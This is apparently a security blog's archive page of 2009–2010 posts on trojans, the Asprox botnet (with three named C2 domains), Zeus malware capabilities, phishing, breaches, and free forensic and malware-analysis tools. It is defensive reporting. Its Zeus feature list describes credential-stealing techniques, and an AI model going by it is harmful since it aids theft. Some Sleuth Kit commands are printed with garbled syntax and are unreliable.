Posts Tagged Cybercrime & Hacking
Fake Windows IME Trojan
Posted by Mourad Ben Lakhoua in Cybercrime & Hacking, Vulnerabilities & attacks on July 11, 2010
Security researchers at Websense have discovered a new Trojan that are using a windows system to disable and delete antivirus software and compromising victim machine.
The Malicious program installs itself as the Windows input method editor (IME) and then stop all AV processes and delete the executable files and mask itself in the system as an antivirus update package.
Websense has issued a blog post defining the way that this Trojan is able to infect windows system. After running the malware a winnea.ime will be created under the system folder in windows.
By opening the default input method, the previous created file winnea.ime will start to search and detects antiviruses.
At the same time, winnea.ime creates a file called pcij.sys to the system folder and loads it as a driver process.
Next DeviceIOControl kills the running process of any antivirus in the list; the control code is sent to the driver process pcij.sys
As it is clear that the input method in Windows is now a popular way for hackers to inject malicious code.
make sure you subscribe to my RSS feed!
Asprox is back!
Posted by Mourad Ben Lakhoua in Cybercrime, Cybercrime & Hacking, Vulnerabilities & attacks on June 27, 2010
Security researchers warn of a fast increase in the infected website with spam-botnet Asprox. Asprox botnet is carrying out attack using SQL-injection, which allowed this botnet to double its presence on the service provider’s access application. For one night the number of compromised resources increased from 5 to 11 thousand.
The botnet usually starts by scanning the network searching for a vulnerable host and if it detects a vulnerable website it conducts an attack on the targeted hosts.
M86 Security Company are currently monitoring and tracking the new threat. On a blog post Rodel Mendrez reported that the pattern of Asprox behavior have changed, while previously it used only to send spams, now it is implementing a massive SQL-injection.
As of this writing, there are three fast-flux domains that the bot attempts to contact.
CL63AMGSTART.RU
HYPERVMSYS.RU
ML63AMGSTART.RU
These three servers are the bot command and control servers, by analyzing the malware binary there are SQL statement as the picture shows:
By decrypting the XML file which the bot receives. Screen shot shows information about the targeted website:
And finally a simple search on Google shows that more than 5000 websites already infected.
As you can see that criminals are always searching for new ways to spread their malwares.
make sure you subscribe to my RSS feed!
Finding the Hidden
Posted by Mourad Ben Lakhoua in Computer Forensics, Software Security, Tools on June 6, 2010
If a hacker managed to compromise a server, it can be used for several things like spreading viruses, sending spam, attacking other hosts or steeling and destroying sensitive information stored on the server.
Restoring a previous copy of the system will not guarantee that the incident do not happens again. That’s why it is now important to learn how to conduct a forensics and determine what really happened.
Forensic investigation will help in solve situation after a breach to help ensure the situation does not occur again, because updating software packages and antivirus definition will not prevent a hacker from using the same method to break into the system one more time.
And it’s very important to determine when the attack occurred, because at some moment it is possible to restore a non-clean copy which could contain a backdoor, but it will look a normal copy.
Collected evidence will also play a big role in identifying where has been the vulnerability (can be a system/ human error or insider breach).
Technology has a good face and at the same time it also has a bad face, as some modern malwares do not leave traces on your hard disk.
As an example, the SQL slammer worm works only on the RAM level and can be detected only on the network activity (port 1434). Encryption is also widely used as a protecting measure (Bitlocker, EFS…) and no key to have access to this information
Forensic tools can help in handling these situations by analyzing and collecting information on the compromised host, this includes:
- Tools for cloning the system and save a copy of partitions
- Tools to create checksums and digital signatures files
- Tools for network activity analyzing and system configuration.
- Tools for analyzing system (processes, libraries…)
Depending on the situation, today we have on the market very few commercial Forensics tools such as ProDiscover from technology pathways, EnCase Forensics and Forensic Toolkit.
Some tools provide a limited versions like ProDiscover Basic Edition Freeware, which is available for download but do not includes network capabilities. On the other hand we can find a special linux distribution where all required tools integrated and configured such as DEFT Linux, FCCU GNU / Linux Forensic Boot CD, Helix3 and others.
Now let’s start browsing some forensics tools.
The first one is TCT (The Coroner’s Toolkit), which allows for both Dead and Live Analysis. The project was replaced by The Sleuth Kit. TSK allows performing analysis on Linux, Mac OS X, Cygwin, FreeBSD, OpenBSD and Solaris for data stored on NTFS, FAT, Ext2, Ext3, UFS1 and UFS2. It includes 24 utilities under following groups:
- File system Layer (f*)- to work with the file system,
- Meta Data Layer (i *) – describes a file or directory
- Data Unit Layer (blk *) – the actual content of blocks, clusters, fragments;
- File System Journal (j *) – log file system;
- Volume System (mm *) – analysis of sections, disk utilities (disk_ *).
For recovering or searching deleted files on partition, we can use fls and icat, to see a list of deleted files using a utility fls:
# Fls-rd / dev/***
-r – makes the program go on all directories; while -d : show only the deleted files.
To find a particular file you can use grep as follows:
# Fls-rd / dev/sda1 | grep-v
‘(Realloc)’ | grep file.doc
For the encrypted volume we can use hfind which looks up hash values in a database using a binary search algorithm. This allows one to easily create a hash database and identify if a file is known or not.
It works with the NIST National Software Reference Library (NSRL) and the output of ’md5sum’.NSRL projects is supported by reputable organization like the National Institute of U.S. Department of Justice (NIJ), National Institute of Standards and Technology (NIST).
For example to create an MD5 index file for NIST NSRL:
# hfind -i nsrl-md5 /usr/local/hash/nsrl/NSRLFile.txt
To lookup a value in the NSRL:
# hfind /usr/local/hash/nsrl/NSRLFile.txt 76b1f4de1522c20b67acc132937cf82e
76b1f4de1522c20b67acc132937cf82e Hash Not Found
Steulth Kit contain a large number of utilities, which makes it difficult to manage, but for this there is a on the official website a visualization tool – Autopsy Forensic Browser, it is an HTML-based graphical interface for the command line tools in The Sleuth Kit. This makes it much easier and faster to investigate a system.
Sysinternals is also very important for conducting forensics operation. To have the whole package you should get the Sysinternals Suite. The sysinternal can helps you to get comprehensive information on everything loaded at the system level such as logs and processes. The tool displays all the registry keys, drivers, DLL, codecs…
PsInfo, PsLogList and ProcessExplorer can get complete information on the system and running processes. List of DLL with their versions, as well as where they were launched, look through ListDLLs. Handle Utility shows a list of open files with an indication of what processes they opened.
Learn about different LogonSessions, PendMoves, PSFile, PsLoggedOn, TCPVcon, TCPView, as well as the standard – ipconfig, netstat, arp, openfiles, systeminfo.
Tool are distributed under the Freeware license and it is possible to maintain the state of memory with ManTech Memory DD which supports Microsoft® products (Windows® 2000, Windows Server 2003, Windows XP®, Windows Vista®, and Windows Server 2008) which gives user non free functionality in EnCase.
These are quick list of free tools to help us in conducting a forensics analyses.
make sure you subscribe to my RSS feed!
Building your OWN Malware Lab (Part 2)
Posted by Mourad Ben Lakhoua in Cybercrime & Hacking, Software Security, Tools on March 7, 2010
Today’s Malware Strategy and Tactics are advanced and sophisticated. The main purpose for that is to trick antiviruses. Some are using encryption to make the detection difficult for any security software product, other add an AutoRuns to the registry entries to defend itself against anti-malware software or just adding a line to the host file to prevent the antivirus from updating their definition.
ThreatExpert is an advanced automated threat analysis system designed to analyze and report the behavior of computer viruses, worms, trojans, adware, spyware, and other security-related risks in a fully automated mode. The produced report by ThreatExpert includes very important information regarding any file and is divided to two parts:
- Submission Summary:
- File submitted information (Date, processing Time and Malware Alias).
- Summary of the findings: here you will find the severity level and what is the impact on the machine (like Creates a startup registry entry, Contains characteristics of an identified security risk, etc).
- Technical Details:
- Possible Security Risk this mean the Threat Category with a short description.
- File System Modifications ( here you can find the filename Modified by Malware ,file size, file Hash , Alias and a Brief Note about the different system concerned )
- Memory modification (if there was a new process created in the system)
- Registry Modifications (The new Registry Values created/Modified or deleted)
- Other details (contains possible countries origin according to the analysis).
For using ThreatExpert services you can follow the Free Online File Scanner or install ThreatExpert Submission Applet for a quick and easy way to submit your samples but before submitting any files you need to register an account to be able to retrieve ThreatExpert reports.
What misses all previous tools is network suspicious traffic analyzing. For the web based threat we can use Anubis. Anubis helps user to submit a suspicious URL and receive a report that shows you all the activities of the Internet Explorer process during visiting this URL. The negative point is that the service works slowly.
Flash, JavaScript, and PDF files can be scanned and handled with Wepawet. Wepawet runs various analyses on the URLs or files that you submit. At the end of the analysis phase, it tells you whether the resource is malicious or not and provides information to help you understand why it was classified in a way or the other. It also displays various pieces of information that greatly simplify the manual analysis and understanding of the behavior of malicious samples.
Another tool to analyze Portable Executable (PE) format files is MANDIANT Red Curtain , MRC examines multiple aspects of an executable file by looking at things such as the entropy (in other words, randomness), indications of packing, compiler and packing signatures, the presence of digital signatures, and other characteristics to generate a threat “score.” This score can be used to identify whether a set of files is worthy of further investigation.
Now you can quickly gather information for any suspicious file. Most of these tools are provided for free and can process a sample of a highly detailed report with technical details match or exceed antivirus Lab.
make sure you subscribe to my RSS feed!
Building your OWN Malware Lab (Part 1)
Posted by Mourad Ben Lakhoua in Cybercrime & Hacking, Software Security, Tools on February 27, 2010
Malicious software pieces like viruses, worms and bots are currently one of the largest threats to the security of the Internet. Antivirus Labs have invested great Money for analyzing and reversing viruses, but for our case we can perform the analysis using some useful tools on our PC.
Let’s start with www.virustotal.com , if I feel that I have a suspicious file. First what I will do is to upload it to VirusTotal. VirusTotal gives the user the ability to analyze any file with more than 40 Antivirus products. With the latest signature definition, this brings a clear idea not only if your file is safe but also to know which AV is effective. The file can be uploaded directly from the site using SSL or sent over the email. You can also download the uploader to your PC and install it which enables you to directly send files from your system using the context menu.
Today it is very important for reversing malware to know virus behavior. User should run the program and detect the changes in the system but this can harm the main system. for this we need Sandboxie. Sandboxie runs your programs in an isolated space which prevents them from making permanent changes to other programs and data in your computer. After installing Sandboxie you will have a big choice of tools for detecting and monitoring the changes on the system. you can use Process Monitor from sysinternal, API Monitor or free analyzing tools from iDEFENSE LABS.
CWSandbox is another very nice tool for performing malware analysis that fulfills the three design criteria of automation, effectiveness and correctness for the Win32 family of operating systems. CWSandbox allows tracing and monitoring all relevant system calls and generating an automated report that describes:
• which files the malware sample has created or modified,
• which changes the malware sample performed on the Windows registry,
• which dynamic link libraries (DLLs) were loaded before executing,
• which virtual memory areas were accessed,
• which processes were created, or which network connections were opened and what information was sent over such connections.
Malware can be so hard to remove, and sometimes the best approach to clean an infected machine is by restoring a clean copy of the operating system. Here we arrived to the end of this new series of Building your own malware Lab.
make sure you subscribe to my RSS feed!
Zeus Trojan infected 2.5 thousands Corperate machine around the Globe
Posted by Mourad Ben Lakhoua in News on February 18, 2010
Over the past 1,5 year more than 75 thousands machine worldwide have been infected by Zeus Trojan this is according to NetWitnes Company, all these infected computers were used to thief Banking account, Social Networking and email passwords.
Among the victims we can find some of the major companies like Merck, Cardinal Health, Paramount Pictures and Juniper Networks. NetWitness informed that Cybercriminals might be from an Eastern European group countries and performed their activities over a server located in Germany, by spreading emails containing malicious software or redirecting victims to a malicious website.
The observed hacking activities do not stop here but researchers noted that on 26 January they found a 76 Gigabytes of data stolen by this Trojan, this data contains information about 68 thousand corporate logins as well as online Banking credential, Facebook , Yahoo and Hotmail.
Attackers According to NetWitness are still actively exploiting all vulnerabilities to spread their dangerous Malware in the globe and controlling remotely all these machines by using different ways like p2p-bots Waldec botnet.
ZeuS consists of two main parts:
1. Command control (panel) – a set of scripts, including the admin area that can be installed on the server.
2. Bot – Win32 victim side (Trojan).
The Main features of Zeus are:
1- Invisible in windows process list
2- Bypass most firewalls.
3- Works on the windows restricted accounts.
4- The main Bot are encrypted
5- Disable Windows Firewall, which provides access to incoming messages/ commands.
6- All settings including configuration ,logs and commands passes over encrypted HTTP form (HTTPS).
7- Separate configuration file are available that allows hackers to find them when they lose access to the Main server.
8- Configuration Backup file are available in case of losing the config.
9- The ability to work with any kind of Browser because the program is running through wininet.dll (Internet Explorer, Mozilla Firefox, AOL…)
10- Interception of all machine activities by including a keylogger.
11- Simple transparent URL-redirection to fake web sites (GET / POST-requests, etc.)
12- Get all SSL/TLS Certificate imported by the victim and send them to the server
13- POP3 and Ftp protocol grabber.
14- Search all Hard disk files and download a specific file as desired by the attacker.
15- Getting screenshot in real time.
As you can see it is very easy to gain access to any person sensitive information so it is important to keep your AV/System definitions up to date to ensure you have the best protection against new threats.
make sure you subscribe to my RSS feed!
Cybercriminals had a phishing Attack on .gov and .mil
Posted by Mourad Ben Lakhoua in Cybercrime, News on February 8, 2010
Criminals are conducting spam attacks on email addresses related to .gov and .mil domain name. According to Brian Krebs Blog post the fake messages includes a link leads to a Trojan Zeus which helps to steal Banking system passwords.
The reason of success of such attacks that the phishing message looks quit legitimate, Recipients are invited to download a report 2020 Project which exist and recently published by the National Intelligence Council of the United States.
At the same time after investigating the email headers the real sender is nobody@sh16.ruskyhost.ru which is a Russian email address.
16 out of 39 Antiviruses detected the malicious software as a dangerous Trojan. Because Cybercriminals are upgrading their Bot Network to cheat on different AV products (F-Secure detected the Trojan as Suspicious:W32/Riskware!Online).
make sure you subscribe to my RSS feed!
Hackers Target Internet Forum Database
Posted by Mourad Ben Lakhoua in Cybercrime & Hacking, Internet, News on January 22, 2010
A popular Irish discussion forum, Boards.ie has been today forced to change all users’ passwords this is due to a security breach where hackers compromised a part of users database on the server.
Tom Murphy one of the portal founders has made an official statement that the site is “regularly the target for disruption and take continual actions to proactively protect data”.
During this attack hackers have gained access to part of the main Database server that stores usernames, email addresses and encrypted passwords for registered users. So as a security measure they started to change all users’ login and password and recommend all subscribers to not use the same accounts credentials on other websites to prevent any identity theft.
The site started life as a forum for the computer game Quake in 1998 and has more than 500 forums on a range of topics.
According to the most recent ABC internet traffic statistics in November, Boards.ie had more than 20m page views, averaging more than 1.1m page views a day.
make sure you subscribe to my RSS feed!
Hacking Cocktail for the Halloween!
Posted by Mourad Ben Lakhoua in Cybercrime & Hacking, Internet, News on October 31, 2009
Cybercriminals are not leaving any chance or event without trying to gain more illegal incomes or distribute their Malware. Here there are some cases of Internet scam and other mail tricks are detected by viruslist regarding the Halloween. Cheap software:
Emails not from legitimate sources for advertising costumes and personalized gifts:
E-cards for the Halloween:
Another case which is unusual that this site provides a browser utility you need to install on your browser to send a wishing card, if the victim in US, Canada or other countries than the spammer will be paid by the toolbar developer, here the toolbar can be any kind of malicious code which can be used to take control over the pc:
If the victim is coming from Russian IP he will be redirected to a lottery site:
This is actually fully expected, Hackers are always optimizing thier website links by spam’s and website redirection accompanied with text intended to attract interest. These kinds of attack are intended to spread malicious software or gain more illegal money or to have more personal credentials. Happy Halloween!
Screen shot sources from Viruslist website.
make sure you subscribe to my RSS feed!
4shared.com Owned!
Posted by Mourad Ben Lakhoua in News, hacking on September 14, 2009
Yesterday it has been reported that 4shared.com was compromised by members of the Anti-sec group. At first many people didn’t believe that the popular file share portal was hacked till that the official sources confirmed the incident.
This attack was made by the end of last week and all users that attempted to visit or check there files on http://www.4shared.com they got another page on it written “I love Morocco” till now there still no details about the attack (if it is DNS poisoning or PHP include…) and what type of vulnerability was exploited.
Maybe this incident brings a big doubt in the security level at the 4shared.com portal even if many users confirmed that everything seems to be there. Any information stored anywhere can be extracted by hackers and there is nothing to prevent us from encrypting our stored information in any desired form. The most important is to be able to decrypt those files 
.
Now the site is working and open to upload your files but do not leave your data unsecure.
make sure you subscribe to my RSS feed!
SUBSCRIBE
Latest Comments